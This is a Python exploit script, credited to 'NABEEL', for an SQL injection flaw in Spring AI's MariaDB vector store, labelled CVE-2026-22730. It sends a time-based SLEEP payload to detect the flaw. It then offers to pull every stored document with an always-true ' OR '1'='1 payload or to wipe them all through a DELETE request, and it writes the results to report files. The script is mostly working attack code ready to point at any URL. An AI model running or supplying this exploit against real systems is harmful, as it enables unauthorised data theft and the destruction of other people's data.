#!/usr/bin/env python3 print(""" ███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░ ░█████╗░██╗░░██╗ ████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗ ██╔══██╗██║░██╔╝ ██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║ ██║░░██║█████═╝░ ██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║ ██║░░██║██╔═██╗░ ██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝ ╚█████╔╝██║░╚██╗ ╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░ ░╚════╝░╚═╝░░╚═╝ CVE-2026-22730 Scanner & Exploit SQL Injection in Spring AI's MariaDB Vector Store Supports GET (query parameter) and POST (JSON body) with placeholder. NULL200OK 💀🔥created by NABEEL 🔥💀 """) import requests import time import json import sys import argparse from datetime import datetime from urllib.parse import urlencode, quote_plus # --------------------------- # Configuration # --------------------------- DEFAULT_SLEEP = 5 # seconds for time-based detection TIMEOUT = 10 # HTTP request timeout USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Marker for payload replacement in POST JSON PAYLOAD_MARKER = "__PAYLOAD__" # --------------------------- # Helper Functions # --------------------------- def send_request(base_url, method, param_name, value, json_template=None): """ Send an HTTP request with the injected value. Supports GET (query parameter) and POST (JSON body with placeholder). Returns (response, elapsed_time). """ headers = {"User-Agent": USER_AGENT} method = method.upper() if method == "GET": params = {param_name: value} url = base_url + "?" + urlencode(params, quote_via=quote_plus) try: start = time.time() resp = requests.get(url, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 elif method == "POST": if not json_template: print("[!] POST method requires --json-template with placeholder.") return None, 0 # Replace marker with actual value body_str = json_template.replace(PAYLOAD_MARKER, value) try: body = json.loads(body_str) except json.JSONDecodeError: print("[!] Invalid JSON template.") return None, 0 headers["Content-Type"] = "application/json" try: start = time.time() resp = requests.post(base_url, json=body, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 elif method == "DELETE": # For DELETE, we can either send query param or JSON body. # We'll support query parameter (as in original advisory) and JSON body if template provided. if json_template: # DELETE with JSON body (some APIs accept it) body_str = json_template.replace(PAYLOAD_MARKER, value) try: body = json.loads(body_str) except json.JSONDecodeError: print("[!] Invalid JSON template.") return None, 0 headers["Content-Type"] = "application/json" try: start = time.time() resp = requests.delete(base_url, json=body, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 else: # DELETE with query parameter params = {param_name: value} url = base_url + "?" + urlencode(params, quote_via=quote_plus) try: start = time.time() resp = requests.delete(url, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 else: print(f"[!] Unsupported method: {method}") return None, 0 def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None): """ Time‑based detection: compare normal request vs. SLEEP payload. Returns True if vulnerable, False otherwise. """ print("[*] Sending baseline request...") resp1, time1 = send_request(url, method, param, baseline_value, json_template) if resp1 is None: print("[!] Baseline request failed. Exiting.") return False # SQLi payload that tries to inject a SLEEP payload = f"' OR SLEEP({sleep_time}) --" print(f"[*] Sending time‑based payload: {payload}") resp2, time2 = send_request(url, method, param, payload, json_template) if resp2 is None: print("[!] Payload request failed. Exiting.") return False print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s") # If payload took at least sleep_time seconds longer, consider vulnerable if time2 - time1 >= sleep_time - 1: # allow 1s network jitter print("[+] Target appears VULNERABLE to SQL injection!") return True else: print("[-] Target does NOT seem vulnerable.") return False def exploit_retrieve_all(url, method, param, json_template=None): """ Send payload that retrieves all rows (by making WHERE clause always true). Returns the response text. """ payload = "' OR '1'='1" print(f"[*] Exploiting with payload (retrieve all): {payload}") resp, _ = send_request(url, method, param, payload, json_template) if resp: return resp.text else: return "" def exploit_delete_all(url, method, param, json_template=None): """ Send payload that deletes all rows. Returns the response text (if any). """ payload = "' OR '1'='1" print(f"[*] Exploiting with payload (DELETE all): {payload}") # Use DELETE method resp, _ = send_request(url, "DELETE", param, payload, json_template) if resp: return resp.text else: return "" def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None): """ Save results in HTML, JSON, and TXT files. """ timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") base_filename = f"cve-2026-22730_{timestamp}" # Prepare data structure report = { "timestamp": timestamp, "target": target_url, "method": method, "vulnerable": vuln_status, "detection_method": "time-based SQL injection", "exploit_type": exploit_type, "exploit_result": exploit_data if exploit_data else None } # JSON with open(f"{base_filename}.json", "w") as f: json.dump(report, f, indent=4) print(f"[+] JSON report saved: {base_filename}.json") # TXT with open(f"{base_filename}.txt", "w") as f: f.write(f"CVE-2026-22730 Scan Report\n") f.write(f"Timestamp: {timestamp}\n") f.write(f"Target: {target_url}\n") f.write(f"Method: {method}\n") f.write(f"Vulnerable: {vuln_status}\n") if exploit_type: f.write(f"Exploit performed: {exploit_type}\n") if exploit_data: f.write("\n--- Exploitation Result ---\n") f.write(exploit_data) print(f"[+] TXT report saved: {base_filename}.txt") # HTML html_content = f"""
Timestamp: {timestamp}
Target URL: {target_url}
HTTP Method: {method}
Vulnerable: {vuln_status}
Type: {exploit_type if exploit_type else "None"}
{exploit_data if exploit_data else "No exploitation performed."}
"""
with open(f"{base_filename}.html", "w") as f:
f.write(html_content)
print(f"[+] HTML report saved: {base_filename}.html")
# ---------------------------
# Main
# ---------------------------
def main():
parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
args = parser.parse_args()
# Interactive mode if arguments missing
if not args.url:
print("=== CVE-2026-22730 Scanner ===\n")
args.url = input("Enter target URL: ").strip()
args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
if args.method not in ["GET", "POST"]:
print("[!] Invalid method. Using GET.")
args.method = "GET"
if args.method == "GET":
args.param = input("Enter query parameter name (e.g., department): ").strip()
else: # POST
args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
if PAYLOAD_MARKER not in args.json_template:
print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
sys.exit(1)
baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
if baseline_input:
args.baseline = baseline_input
sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
if sleep_input:
try:
args.sleep = int(sleep_input)
except ValueError:
print("[!] Invalid number. Using default.")
else:
# Validate arguments
if args.method == "POST" and not args.json_template:
print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
sys.exit(1)
if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
sys.exit(1)
if args.method == "GET" and not args.param:
print("[!] GET method requires --param.")
sys.exit(1)
# Remove trailing slash if present
args.url = args.url.rstrip("/")
print(f"\n[*] Targeting: {args.url} with method {args.method}")
# Step 1: Detection
vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)
exploit_data = None
exploit_type = None
if vuln:
print("\n[?] Target is vulnerable. Choose exploitation option:")
print(" 1. Retrieve all documents (SELECT injection)")
print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE")
print(" 3. Skip exploitation")
choice = input("Enter 1, 2, or 3: ").strip()
if choice == '1':
exploit_type = "RETRIEVE_ALL"
exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
if exploit_data:
print("[+] Data retrieval completed.")
else:
print("[!] Exploit failed or returned no data.")
elif choice == '2':
print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
confirm = input("Type 'yes' to confirm: ").strip().lower()
if confirm == 'yes':
exploit_type = "DELETE_ALL"
exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
if exploit_data:
print("[+] Delete request sent. Check response.")
else:
print("[!] Delete exploit failed.")
else:
print("[*] Deletion cancelled.")
else:
print("[*] Skipping exploitation.")
# Step 3: Save results
save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)
if __name__ == "__main__":
main()